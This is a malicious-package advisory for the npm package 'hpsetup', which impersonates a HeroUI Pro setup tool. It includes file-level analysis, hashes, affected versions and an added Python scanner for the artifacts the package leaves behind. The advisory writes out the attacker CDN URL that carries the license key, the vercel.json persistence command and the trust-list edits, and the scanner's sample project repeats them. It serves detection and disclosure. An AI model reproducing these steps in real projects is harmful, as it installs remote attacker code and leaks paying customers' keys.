MAL-2026-4579

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hpsetup/MAL-2026-4579.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4579
Published
2026-05-20T00:54:17Z
Modified
2026-06-12T20:01:52.719785021Z
Summary
Malicious code in hpsetup (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (16ed0c34d69e1ea3c5052e3eed20b87fc47e8d4bf1393f7117d34b847347e12c)

When npx hpsetup <key> runs, the tool fetches a tarball from https://hpsetup-cdn.932324.xyz/api/tarball/<slug>/<version>?key=<userKey> and extracts it directly into node_modules/@heroui-pro/react (or heroui-native-pro) with no hash check, no signature verification, and no version pin to a publisher origin (src/constants.js:16, src/download.js:24). The destination is a numeric .xyz subdomain unrelated to HeroUI's real publisher infrastructure, and the package itself ships no homepage, repository, or author fields linking it to heroui.com — yet it brands itself as the HeroUI Pro setup tool and writes into the @heroui-pro scope on the consumer's disk. Whatever bytes the CDN returns become the React component library required at runtime, giving the operator of 932324.xyz arbitrary code execution in every consuming application.

The user's license key (HEROUIKEY / hpxxx) is appended as ?key=<userKey> to every CDN fetch, silently relaying paying-customer credentials to the lookalike host (src/download.js:24).

After download, the tool patches vercel.json to set installCommand: npx -y hpsetup@latest <userKey> (src/vercel.js:18-29), pinning every future Vercel deployment to re-fetch code from the same .xyz CDN and re-send the key — non-interactive runs skip the prompt and apply this automatically.

The downloaded tarball's dist/postinstall/ directory and scripts.postinstall entry are silently scrubbed from the package.json before the package manager sees it (src/download.js:11-19), concealing whatever lifecycle script the CDN delivered from npm/pnpm/bun audit and trust prompts.

Before any user prompt, the flow also patches pnpm-workspace.yaml allowBuilds / pnpm.onlyBuiltDependencies / trustedDependencies to auto-trust @heroui-pro/react and heroui-native-pro (src/install.js:80-92, src/trust.js:1), elevating the privilege of CDN-delivered code without consent.

The combination — non-publisher mutable code drop, license-key exfiltration to that same host, CI persistence, postinstall concealment, and silent trust-store mutation — is unambiguous attacker infrastructure impersonating HeroUI Pro.
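A defender-side check for the persistence and trust-store changes the details above describe, added here as an example that is not part of this record or of the hpsetup package: it scans a project root for the vercel.json installCommand, the pnpm-workspace.yaml and package.json trust entries, and the out-of-band node_modules/@heroui-pro install. The project layout and the constructed sample files are assumptions of the example.

```python
import json
import os
import tempfile

# Indicators come from the advisory text above; the scanner and the assumed
# project layout are this added example's, not the hpsetup package's code.
CDN_PKGS = ("@heroui-pro/react", "heroui-native-pro")
TRUST_KEYS = ("allowBuilds", "onlyBuiltDependencies", "trustedDependencies")

def _read(root, name):
    try:
        with open(os.path.join(root, name), encoding="utf-8") as fh:
            return fh.read()
    except OSError:
        return ""  # a missing file is simply no evidence

def _json(text):
    try:
        return json.loads(text) if text else {}
    except ValueError:
        return {}

def scan_project(root):
    """List the persistence and trust-store changes the tool leaves behind."""
    findings = []
    cmd = str(_json(_read(root, "vercel.json")).get("installCommand", ""))
    if "hpsetup" in cmd:
        findings.append("vercel.json: installCommand re-runs hpsetup on every deploy")
    ws = _read(root, "pnpm-workspace.yaml")  # substring check, no YAML parser
    if any(k in ws for k in TRUST_KEYS) and any(p in ws for p in CDN_PKGS):
        findings.append("pnpm-workspace.yaml: CDN-delivered packages auto-trusted")
    pkg = _json(_read(root, "package.json"))
    trusted = set(pkg.get("trustedDependencies", [])) | set(pkg.get("pnpm", {}).get("onlyBuiltDependencies", []))
    if trusted.intersection(CDN_PKGS):
        findings.append("package.json: CDN-delivered packages in build trust list")
    for name in CDN_PKGS:
        if os.path.isdir(os.path.join(root, "node_modules", name)):
            findings.append(f"node_modules/{name}: present, verify its origin")
    return findings

def make_sample_project():
    root = tempfile.mkdtemp()  # constructed sample carrying the edits described above
    with open(os.path.join(root, "vercel.json"), "w") as fh:
        json.dump({"installCommand": "npx -y hpsetup@latest hp_EXAMPLE_KEY"}, fh)
    with open(os.path.join(root, "pnpm-workspace.yaml"), "w") as fh:
        fh.write("allowBuilds:\n  '@heroui-pro/react': true\n")
    with open(os.path.join(root, "package.json"), "w") as fh:
        json.dump({"pnpm": {"onlyBuiltDependencies": ["@heroui-pro/react"]}}, fh)
    os.makedirs(os.path.join(root, "node_modules", "@heroui-pro", "react"))
    return root
```

Run scan_project on each checkout and CI workspace that may have invoked hpsetup; an empty list means none of the described artifacts are present, not that the installed library is clean.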

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-26T05:50:26.574004449Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T01:01:56Z",
            "id": "IN-MAL-2026-003333",
            "versions": [
                "4.5.3-beta.15"
            ],
            "sha256": "16ed0c34d69e1ea3c5052e3eed20b87fc47e8d4bf1393f7117d34b847347e12c"
        },
        {
            "import_time": "2026-05-26T05:50:26.36110872Z",
            "source": "amazon-inspector",
            "sha256": "c6d41c41818cea16846d0c53de7213a5ae75b338b9be0a31d3b8f8cf9b732fb0",
            "id": "IN-MAL-2026-003331",
            "versions": [
                "4.5.5-beta.0"
            ],
            "modified_time": "2026-05-20T00:58:45Z"
        },
        {
            "sha256": "cfedaf7d6d7d2e5179dc4e4de9d285ad23d5fe0301c092b645d7b2366008f3e0",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T00:54:17Z",
            "id": "IN-MAL-2026-003330",
            "versions": [
                "4.5.3-beta.21"
            ],
            "import_time": "2026-05-26T05:50:26.240706569Z"
        },
        {
            "sha256": "f4117e096edeba8ed55669dfbd80e9bde0f1275b01f2aaa5a34f3d7ce593e43f",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:18.433345634Z",
            "id": "IN-MAL-2026-003784",
            "versions": [
                "4.5.5-beta.2"
            ],
            "modified_time": "2026-05-21T08:35:37Z"
        },
        {
            "import_time": "2026-05-26T05:51:23.195873973Z",
            "source": "amazon-inspector",
            "sha256": "feb7be854981e59ab670c35dad6da08ab5d7e5113ec30f15ad24fc87547f65d2",
            "id": "IN-MAL-2026-003821",
            "versions": [
                "4.5.5-beta.8"
            ],
            "modified_time": "2026-05-21T13:30:35Z"
        },
        {
            "modified_time": "2026-05-21T14:26:40Z",
            "source": "amazon-inspector",
            "sha256": "4b9473fd8455718f8a877a38eeb82104b692f00e13b0421f6a03ef285969541e",
            "id": "IN-MAL-2026-003868",
            "versions": [
                "4.5.5-beta.9"
            ],
            "import_time": "2026-05-26T05:51:28.934999568Z"
        },
        {
            "import_time": "2026-05-26T05:51:19.85393634Z",
            "source": "amazon-inspector",
            "sha256": "56ddba5d5d70ba490441bdcbd64b502d09700e975a15830b45b87bb9fd8d4d8f",
            "id": "IN-MAL-2026-003796",
            "versions": [
                "4.5.5-beta.7"
            ],
            "modified_time": "2026-05-21T09:38:14Z"
        },
        {
            "import_time": "2026-05-26T05:51:18.873444465Z",
            "source": "amazon-inspector",
            "sha256": "8f7e44a55b38e79df2319abde3ebf72194f1f709f0e7fa66fd0621cd734cab31",
            "id": "IN-MAL-2026-003787",
            "versions": [
                "4.5.5-beta.3"
            ],
            "modified_time": "2026-05-21T09:05:08Z"
        },
        {
            "import_time": "2026-05-26T05:50:29.57401688Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T01:29:44Z",
            "id": "IN-MAL-2026-003360",
            "versions": [
                "4.5.3-beta.7"
            ],
            "sha256": "914e178d38b1132f080800e583e4a0e9bd51e0baaa48b8192bbb55057134bf93"
        },
        {
            "import_time": "2026-06-12T19:43:36.177888914Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:02:31Z",
            "id": "IN-MAL-2026-005814",
            "versions": [
                "4.5.7-beta.1"
            ],
            "sha256": "a1d2bb391167b94145f855e66553133a2afa977778eda22ef893950f649c11ed"
        },
        {
            "import_time": "2026-06-12T19:43:36.263550606Z",
            "source": "amazon-inspector",
            "sha256": "b2d9e7ba2793b481e2eebe1ae9e7393c389d9d525af665ab567d6609f8d2c8b4",
            "id": "IN-MAL-2026-005815",
            "versions": [
                "4.6.0"
            ],
            "modified_time": "2026-06-12T19:02:33Z"
        }
    ]
}

Affected packages

Package: npm / hpsetup
Affected ranges: 4.*
Affected versions: 4.5.3-beta.7, 4.5.3-beta.15, 4.5.3-beta.21, 4.5.5-beta.0, 4.5.5-beta.2, 4.5.5-beta.3, 4.5.5-beta.7, 4.5.5-beta.8, 4.5.5-beta.9, 4.5.7-beta.1, 4.6.0

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hpsetup/MAL-2026-4579.json"
cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "hpsetup-4.5.3-beta.15.tgz",
            "hashes": {
                "sha1": "1e00fcfb99eb66b9291c0a487324851cc9ca6be9",
                "sha512_sri": "sha512-iHhLQX/BZa1Bt/m6lOfg3WcXl7sw0riWMfrAy5uQRI7MT1LZ+msvk5AWktN4NBm2cDw3lzqGFlr4J7UHAI4clA=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "854185a70af18b720cb542901a0f60692f348002b64af7e0d2dc0fd47fc1158dd93abd",
            "path": "src/download.js",
            "sha256": "41265c74bb56042ba4ca5efbfca0c2642ba254dab806f731bf91f4b7255103ba"
        },
        {
            "tlsh": "8b414017dbfe2e322ca16515448b001173a04ba33108daa971ff269d1fc78b8c5a36ee",
            "path": "src/vercel.js",
            "sha256": "d7945792ea6519e24c59e6c78cc57db29404a8b37c1d149fb2abbdaa495be9f4"
        },
        {
            "tlsh": "8ba2a72982f31576243327a58a1b2042f738e2533508da84be9f67541f47d38d7abbed",
            "path": "src/install.js",
            "sha256": "b281381c20c90a5b07a33e36f514ae9cd829705c1f3b8ebcdafbf8cf8bc4380a"
        },
        {
            "tlsh": "c5e0d854c9265d7321c825b2182e14677530c98b46587c2c73d7607caf6c29f35fa96d",
            "path": "package.json",
            "sha256": "fb806314215089f7283a02f94dd7e6418191fd4e5996820454ade67aa85a6fc8"
        }
    ]
}